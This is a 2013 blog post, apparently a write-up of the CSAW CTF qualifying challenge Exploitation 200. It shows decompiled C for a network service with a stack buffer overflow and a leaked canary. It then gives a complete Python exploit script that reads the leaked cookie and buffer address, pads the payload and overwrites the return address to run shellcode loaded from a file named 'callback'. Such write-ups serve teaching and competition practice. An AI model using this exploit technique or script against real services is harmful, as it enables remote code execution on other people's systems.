Monday, September 23, 2013

CSAW CTF Quals: Exploitation 200

This binary required using the location of the memory location of the buffer and a secret sent across the socket. The stack canary being implemented was the value of secret which they sent. The important code is shown below.
  unsigned int v1;
  char buffer[2048]; 
  unsigned int cookie; 

  cookie = 0;
  memset(buffer, 0, sizeof(buffer));
  v1 = time(0);
  srand(v1);
  secret = rand();
  cookie = secret;
  *(_DWORD *)buffer = buffer;
  send(newsock, buffer, 4u, 0);
  send(newsock, &cookie, 4u, 0);
  send(
    newsock,
    "Welcome to CSAW CTF.  Exploitation 2 will be a little harder this year.  Insert your exploit here:",
    0x63u,
    0);
  recv(newsock, buffer, 0x1000u, 0);
  buffer[2047] = 0;
  if ( cookie != secret )
  {
    close(newsock);
    exit(0);
  }
After Sending a couple strings composed entirely of the cookie, I was able to determine that the canary value location on the stack was 2048 bytes, with control of eip being taken at 2064 bytes. With control of eip, we jump to the address of the beginning of our array that we received and conveniently holds our shellcode. The following code is the script used to beat the challenge.
import socket
import binascii
# create an INET, STREAMing socket
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
#now connect to the web server on port 80
# - the normal http port
#s.connect(("10.18.0.85", 31338))
s.connect(("128.238.66.212", 31338))
f = open("callback", "r")
exploit = f.read(94)
print (len(exploit))
print (binascii.hexlify(exploit))
buffer_addr = s.recv(4)
cookie = s.recv(4)
print "got buffer"
print (binascii.hexlify(buffer_addr))
print "got cookie"
print (binascii.hexlify(cookie))
print (s.recv(256))
exploit += 'A'*(2048-94)
print "len is now 2048?"
print (len(exploit))
exploit += cookie
exploit += buffer_addr
exploit += buffer_addr
exploit += buffer_addr
exploit += buffer_addr
s.send(exploit)
buffer_addr = s.recv(4)
cookie = s.recv(4)
print "got buffer"
print (binascii.hexlify(buffer_addr))
print "got cookie"
print (binascii.hexlify(cookie))
print (s.recv(256))

Feel free to comment or ask questions!

-- Imp3rial

No comments:

Post a Comment